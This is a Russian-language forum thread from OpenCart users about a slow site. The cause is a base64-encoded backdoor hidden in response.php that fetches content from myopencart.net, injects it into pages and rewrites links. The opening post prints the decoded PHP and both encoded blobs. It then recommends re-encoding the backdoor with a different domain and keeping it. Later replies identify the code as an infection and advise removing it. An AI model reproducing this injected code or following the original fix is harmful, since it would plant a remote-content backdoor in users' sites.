Plinio

Тормозил сайт из-за ссылки на myopencart.net

Рекомендуемые сообщения

Plinio    4

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

 

1. после установки скрипта времени генерации страницы (вставлять в index.php - в начало 1 часть и в конец вторую часть кода):

 

 

 

 

// 1 часть кода

<?php  

// фиксация времени начала генерации страницы  
$begin = microtime();  
// матрица начального времени с секундами и миллисекундами  
$arrbegin = explode(" ",$begin);  
// Полное начальное время
$allbegin = $arrbegin[1] + $arrbegin[0];  

?>  
//......код файла index.php здесь.......

 

 

//  2 часть кода, ставится в конце:

<?php  

// фиксация времени останова   
$stop = microtime();  
// матрица времени останова с секундами и миллисекундами  
$arrend = explode(" ",$stop);  
// Полное время останова
$allend = $arrend[1] + $arrend[0];  
// вычитание из конечного времени начального  
$alltime = $allend - $allbegin;  

// вывод в браузер времени генерации страницы  
$format = "Страница сгенерирована за %f секунд";
printf($format,$alltime);  

?>
 

 

 

 

понял что страница на сайте грузится 5-6 секунд.

 

2. После 2 дней полемики с техподдержкой, мне дали нормальный ответ:

В коде сайта, точнее в файле system/library/response.php

есть следующая строка:


$ouput = eval(base64_decode(тут закодированный скрипт='));
Она находится в самом в конце, можете сами убедится.
Если его расшифровать, то получим следующий код:

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "http://opencart.com", "http://=^_^=.ru",
"http://myopencart.ru", "https://opencartforum.com", "http://opencart.ru", "http://opencart.by");
$replace = array("", $ftend, "http://myopencart.net", "http://myopencart.net",
"http://myopencart.net", "http://myopencart.net", "http://myopencart.net", "http://myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
Из которого видно что скрипт обращается к myopencart.net, для

которого не прописан IP:


$ dig a myopencart.net
; <<>> DiG 9.9.2-P1 <<>> a myopencart.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62470
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL:
0
;; QUESTION SECTION:
;myopencart.net.                        IN      A
3. В итоге на сайте _ttp://www.codenet.ru/services/base64_encode-base64_decode/ расшифровал зашифрованный код, опять же через этот сайт его зашифровал, только вместо myopencart.net, написал myopencart.ru

 

в итоге зашифрованный код установил в файл system/library/response.php вместо старого:

 

1. Такой был


ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0=
 

 

2 Такой стал


ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0LnJ1L2dvb2dsZWNvZGUvYXBpL2FwaS5waHA/c2VydmVyPSIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uIiZwYWdlPSIuJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKXsKJGZpbmQgPSBhcnJheSgiPC9ib2R5PiIsICI8L2h0bWw+IiwgIm9wZW5jYXJ0LmNvbSIsICJtYXh6b24ucnUiLCAibXlvcGVuY2FydC5ydSIsICJvcGVuY2FydGZvcnVtLnJ1IiwgIm9wZW5jYXJ0LnJ1IiwgIm9wZW5jYXJ0LmJ5Iik7CiRyZXBsYWNlID0gYXJyYXkoIiIsICRmdGVuZCwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1IiwgIm15b3BlbmNhcnQucnUiLCAibXlvcGVuY2FydC5ydSIsICJteW9wZW5jYXJ0LnJ1Iik7CiRvdXB1dCA9IHN0cl9yZXBsYWNlKCRmaW5kLCAkcmVwbGFjZSwgJG91cHV0KTsKaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCJvZmYiKTsKZXJyb3JfcmVwb3J0aW5nKDApOwplY2hvICRvdXB1dDt9CmVsc2UgewplY2hvICRvdXB1dDsKfQ==
 

 

 

 

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

Изменено пользователем rb2
unlink

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
dustin    1

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Plinio    4

Вот спасибо тебе!

поменял, скорость загрузки выросла с 5.5 до 0.91 секунды!

Неправильно даже сделал оказывается, более правильно написано в разделе форума:

 

https://opencartforum.com/topic/22202-proverka-na-nalichie-vredonosnogo-koda-na-vashikh/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
delovoy    52

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
exael    3

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Plinio    4

Не фига себе, а тут многие голову ломают, почему тормозит :)

 

А удалить вообще нельзя?

Можно и нужно

Нужно заменить файл response.php на нормальный, не взломанный http://opencartforum...oda-na-vashikh/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
gsnx    0

Здравствуйте,

неделю тормозил сайт, не мог понять из-за чего. Списался с техподдержкой 1gb.ru (на этом хостинге у меня сайт) и выяснилось следующее:

...........

После этого сайт стал грузится за 0,5 - 1 секунду, вместо 5-6. Видимо недоработка движка.

 

Спасибо за пояснение!

А какая у вас версия опенкарта?

Почему недоработка? Это же поясняется в этой ветке настоящего форума, это заражение файла было! Удалите этот код, либо просто файл замените!

 

Я для проверки скачал два разных дистрибутива ocStore 1.5.4.1 с какого-то стороннего ресурса и с гугла хранилища, ни в одном нет такого кода, ну понятное дело что это было не на всех архивах. Да и дистрибутивы от октября 2012 года, хотя написано что заражены были в апреле 2013 где-то они...

 

Будем знать что такое бывает. Только стал просматривать инфу по установке магазина и "на тебе" такие заявочки нехорошие...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу